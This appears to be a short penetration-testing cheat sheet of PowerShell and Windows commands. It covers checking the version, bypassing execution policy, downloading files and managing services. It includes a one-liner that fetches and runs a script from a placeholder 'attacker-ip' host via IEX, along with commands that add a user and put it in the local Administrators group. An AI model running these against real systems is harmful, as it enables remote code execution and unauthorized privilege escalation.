Powered by

# PowerShell

# Check Version

If the following command doesn't work, assume it's powershell 1.0.

powershell -Command "$PSVersionTable.PSVersion"

# execution bypass

load a powershell shell with execution policy bypassed

powershell -ep bypass

# Downloading Files

In PowerShell 2.x:

powershell -Command '$WebClient = New-Object System.Net.WebClient;$WebClient.DownloadFile("http://10.0.0.1/path/to/file","C:\path\to\file")'

In PowerShell 3 and above:

powershell -Command 'Invoke-WebRequest -Uri "http://10.0.0.1/path/to/file" -OutFile "C:\path\to\file"'

# Running Powershell Scripts 

powershell IEX(New-Object Net.Webclient).downloadstring('http://<attacker-ip>:<attacker-port>/script.ps1')
powershell -noexit -file "C:\path\to\script.ps1"

Bypassing Execution Policy

powershell -executionPolicy bypass -noexit -file "C:\path\to\script.ps1"

# adding users 

net user /domain <username> <password>
net localgroup Administrators <username> /add   #add a user to the local administrator group

# services 

powershell -c Get-Service  # list all services
sc stop theservice         # stop service
sc start theservice        # start service

© Copyright 2021. All rights reserved.